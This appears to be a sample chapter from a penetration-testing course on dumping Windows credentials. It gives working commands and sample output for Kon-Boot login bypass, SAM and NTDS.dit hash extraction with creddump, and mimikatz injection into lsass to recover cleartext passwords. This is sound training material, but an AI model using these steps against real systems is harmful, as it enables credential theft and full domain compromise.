WARNING! Sample chapter

WARNING! Sample chapter- Materials in this sample chapter is selected advanced penetration from

https://training.zdresearch.com- We hope you enjoy it !

Obtaining Windows Passwords

- Now you know about pass the hash and how windows hashing works lets look at some attack scenario

- Let’s assume that we are within a network that using domain controller for managing resources and users .

Obtaining Windows Passwords - For your remember let’s take a quick look at how Active directory

works again

Obtaining Windows Passwords - Ok now let’s go for scenarios that we can use to obtain NT and LM

hashes for doing pass the hash attacks.

1- Physical attack and password bypass2- Dumping NT and LM hashes using SAM database3- Dumping Windows passwords from password history4- Dumping passwords and hashes from logon sessions 5- Dumping hashed password from Domain Controller

Physical attack and password bypass• In first scenario we have physical access to the system so how we can

login into password protected system ? • the answer is very easy windows do not offer any protection for

physical access attacks• You can use any live disk to modify SAM database in /system32/config• You can boot using both USB and CD • But there is problem in this method the user will informed it when you

modified her/his password or added totally new user• So what is solution now ?

Physical attack and password bypass• Using Kon-Boot to win• You can buy it for 15$ • http://www.piotrbania.com/all/kon-boot/• Kon-Boot will doing temporary patch on kernel• So you can login with any user without the pass• Do your jobs and restart the system• The original password will still work • So you did full stealth attack !

Dumping NT and LM hashes using SAM database

• Second scenario is using

• You need copy of protected SAM file and by default not possible• Using hobocopy or Fast RAW file copier make it possible

C:\hobo copy\x64>HoboCopy.exe c:\Windows\System32\config c:\config-bkp44 files (136.92 MB, 1 directories) copied, 0 files skipped

Dumping NT and LM hashes using SAM database

• Now you can use creddump in your BT/Kali to extract hashes • You need copy of protected SAM file and by default not possible• Using hobocopy or Fast RAW file copier make it possible

• you can see the SYSTEM file here this file is called system hive and syskey too and used for offering more securing password mechanism

root@bt:/pentest/passwords/creddump# ./pwdump.py /root/SYSTEM /root/SAMAdministrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::

Dumping Windows passwords from password history

• In the networks with more than 10 user maybe you are out of luck if you look at SAM file

• But refer to how DC is configured we may can use some situation to find attacks on host machine

• One of main situations here is using Password history feature

Dumping Windows passwords from password history

• This policy will not let user use same password they used in X period • For example if your password was 12345 your next password after

expire can’t be same as 12345 • A very cool tool called QuarckspwDump can help you to dump hashes

in these situations

C:\>QuarksPwDump.exe -dhl –histAdministrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::

Dumping passwords and hashes from logon sessions

• We are still not down ! We have a more very cool methods to obtaining windows passwords

• Windows will keep every single success login in memory and call this logon session

• The info in memory includes username , workgroup and NT:LM hashed password

• And this memory storage is not only about GUI login it can be happen from :• RDP login• Using RunAS feature• Using every API call that needs login like CreateProcessWithLogon• Etc.

Dumping passwords and hashes from logon sessions

• For extracting logon session as you know you need privileged user • For this task we will use french tool called mimikatz• http://blog.gentilkiwi.com• This tool will extract passwords by injection a DLL called securlsa.dll

into lsass.exe process• You can follow next slide method to dump windows passwords in clear

text !• Please note you should write every command after # sign .

Dumping passwords and hashes from logon sessions mimikatz # privilege::debug

Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 432…mimikatz # @getLogonPasswords fullAuthentification Id : 0;470133Package d'authentification : NTLMUtilisateur principal : AdministratorDomaine d'authentification : Sensetive-man msv1_0 : * Utilisateur : Administrator * Domaine : Sensetive-man * Hash LM : 44efce164ab921caaad3b435b51404ee * Hash NTLM : 32ed87bdb5fdc5e9cba88547376818d4 wdigest : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : 123456 tspkg : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : 123456 kerberos : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : 123456mimikatz #

Dumping passwords and hashes from logon sessions

• Ok so we can clear-text password why ?• In Windows after Vista there is new (SSP) Security Support Provider for

RDP shortly called Tspkg . This feature will add single sing-on (remember me !) to this protocol.

• And in almost all Windows we have another feature called WDigest and this is another SSP implementation for authentication and due to logical flow in it, for responding to challenges it will keep clear-text version of password in memory.

Dumping passwords and hashes from logon sessions

• Using Kerberos protocol or msv1_0 authentication that used by lsass for connecting to domains, will force the windows to keep passwords in clear-text .

• In following figure you can see SSP settings for windows 7 machine .

Dumping hashed password from Domain Controller

• Ok we are at last method in our dumping windows password journey• To now you should can understand it easily you can find your DC

manager password from your host memory .• So you will connect to your DC using RDP and will look at the SAM file

and all you will get is the users for DC machine not all users domain users.

• For getting all users password you should head on to \windows\NTDS

Dumping hashed password from Domain Controller

• For accomplishing this task we need two tool one is called libesedb and our previously used creddump

• http://sourceforge.net/projects/libesedb/• http://code.google.com/p/creddump/ • So you can have to compile libesedb and put your hash table you got

from NTDS in NTDS.export directory #cd libesedb#chmod +x configure#./configure && make-- Now extract the hash table from ntds.dit and put it in NTDS.export directory in same program directory#cd esedbtools#./esedbdumphash ../../ntds.dit Now you can use creddump to dump passwrds remember you need SYSTEM fileroot@bt:~/creddump# python dsdump.py ../SYSTEM ../NTDS.export/datatable Administrator:500:NO PASSWORD*********************:031F8E5A76932FC5CC7431680ADAE4EC:::

End of sample• Using these simple tools and tricks you can successfully completely

compromise a lot of windows network during your penetration tests. I hope you enjoyed the sample and see you in full course !!!